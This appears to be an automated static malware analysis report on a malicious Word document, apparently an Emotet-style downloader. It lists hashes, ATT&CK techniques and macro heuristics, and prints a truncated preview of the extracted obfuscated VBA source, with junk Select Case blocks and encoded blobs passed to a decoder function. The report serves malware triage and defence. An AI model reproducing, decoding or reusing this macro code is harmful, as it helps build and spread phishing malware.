Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ae4ba9c43203e0db…

MALICIOUS

Office (OLE)

Size: 259.5 KB
Created: 2018-03-28 04:55:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: ccb3baaef563d1763b6ef2950a7b9871
SHA-1: f50fd4a62dad21f833cd255c565d48832348872f
SHA-256: ae4ba9c43203e0db863f9367f6e4d678fdf55df2bf41ea8a3a6c56cdd7c4776a
Risk Score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple OLE_VBA_* heuristic firings and the presence of a macros.bas file. The AutoOpen macro and CreateObject calls suggest an attempt to execute code. The ClamAV detection and the nature of the heuristics point towards a downloader, likely delivered as a spearphishing attachment.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 58893 bytes
SHA-256: 6466897a0d832a6464343d0ab69eb599021978e7b3874a30f0c0af882575ea32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "djruDAADhuVoH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QTwXfIhZd"
Function BzHNshSC()
On Error Resume Next
Select Case KCEjdz
      Case 32213
         bSnKm = CStr(ZqwsqD + CStr(75768) - SEDKLP * 60696)
      Case 59937
         IRavvw = wNhdl
         jzDBl = Tan(65912 * FpIvX)
End Select
IwAuB = WaFBtl("55KADEAMwA5AGEAMAAzADAANAA3AGIAOQBlfV0j", 4, 31)
Select Case zfSmBh
      Case 92659
         itMfd = CStr(XucWKB + CStr(16403) - GHJdz * 48156)
      Case 82041
         IiXMw = jajvpo
         DrWHn = Tan(66957 * MmlVa)
End Select
Select Case uKhkG
      Case 47799
         TljuZV = CStr(iQwaHF + CStr(69942) - JjFVIK * 23762)
      Case 91861
         HOUNw = loRXH
         TKoTLB = Tan(24888 * RwcSJ)
End Select
FUafUUj = WaFBtl("r.2YQAxAGYAZgA3ADEAMQBjAYpiX1n", 4, 21)
Select Case wilQU
      Case 14378
         anKBfi = CStr(Nmphdp + CStr(79649) - QBzIz * 72045)
      Case 77324
         lBEvY = CBCzG
         XdSfST = Tan(94362 * HvpULZ)
End Select
Select Case QMJhzM
      Case 69974
         AwUcP = CStr(jUPmd + CStr(36020) - fMddc * 61240)
      Case 24215
         ZEaPuj = MuRRqI
         titwzZ = Tan(36281 * uLpKl)
End Select
JEpHRatSm = WaFBtl("bADQAZQBhAGIANAAxAGEANgBmADYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAwC8QNC,", 2, 131)
Select Case jEVjXw
      Case 51642
         tNVkrI = CStr(UMcNs + CStr(38029) - jdimKD * 19455)
      Case 30038
         jzpfp = kSLLwo
         dNiJBZ = Tan(97517 * wsjlU)
End Select
Select Case uXTfk
      Case 88770
         ruwPD = CStr(KAmRP + CStr(95065) - stpzL * 59783)
      Case 64182
         SSFiGi = JSqPSS
         mtSHJ = Tan(59686 * pbqwuQ)
End Select
nwRKm = WaFBtl("Vjj0AYgBiAGUANQBlAGQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMfWcKv", 5, 82)
Select Case hVUFM
      Case 65998
         bthwc = CStr(rTbAiw + CStr(71518) - viDVC * 98124)
      Case 54376
         OjMSjb = VJGkhL
         lKjCk = Tan(42571 * qUvfum)
End Select
Select Case FTSvuG
      Case 99528
         TiLnw = CStr(jfljt + CStr(67510) - FFwut * 68167)
      Case 80430
         TVJdQr = cPaks
         OlMWbG = Tan(43161 * qjZlMz)
End Select
VULAIn = WaFBtl("wdgA3ADEAYwBkrLiiG", 3, 11)
Select Case TAAXJ
      Case 79878
         NCKiS = CStr(CWGIqj + CStr(84426) - mYScT * 96053)
      Case 54641
         jrErqI = ZNisN
         KMsou = Tan(65808 * ZQufI)
End Select
Select Case wkSKaQ
      Case 54235
         WwLjFB = CStr(WiMaZ + CStr(48744) - sYIWTT * 82532)
      Case 6223
         VEozVz = fAzUnB
         Zlnzz = Tan(13640 * qOPIr)
End Select
UTmmpiXjlF = WaFBtl("GuvFmGUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3AGQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAJLGk", 6, 182)
Select Case CEzIET
      Case 11310
         cRDwYk = CStr(ZZECqN + CStr(66908) - jTrwci * 81518)
      Case 47984
         iDvbDq = TvUzU
         AbWjRo = Tan(20704 * BjTTR)
End Select
Select Case anZmJs
      Case 29136
         vsKXi = CStr(EQfFzh + CStr(19778) - wqoITj * 22167)
      Case 48996
         mcDHQv = nFVjol
         UPVtS = Tan(1792 * mvazoj)
End Select
tJVNfVUPFY = WaFBtl("nTA2ADQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0ADYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAnsKQ1", 3, 198)
Select Case BYiGVJ
      Case 47123
         flnVwS = CStr(LdlNVT + CStr(86401) - nsYBzj * 55683)
      Case 14395
         MkljnZ = bwZjj
         zEOsj = Tan(92879 * aNiIa)
End Select
Select Case lGcEc
      Case 72129
         wMLVdu = CStr(tszGtK + CStr(39822) - flfYiA * 95866)
      Case 45503
    
... (truncated)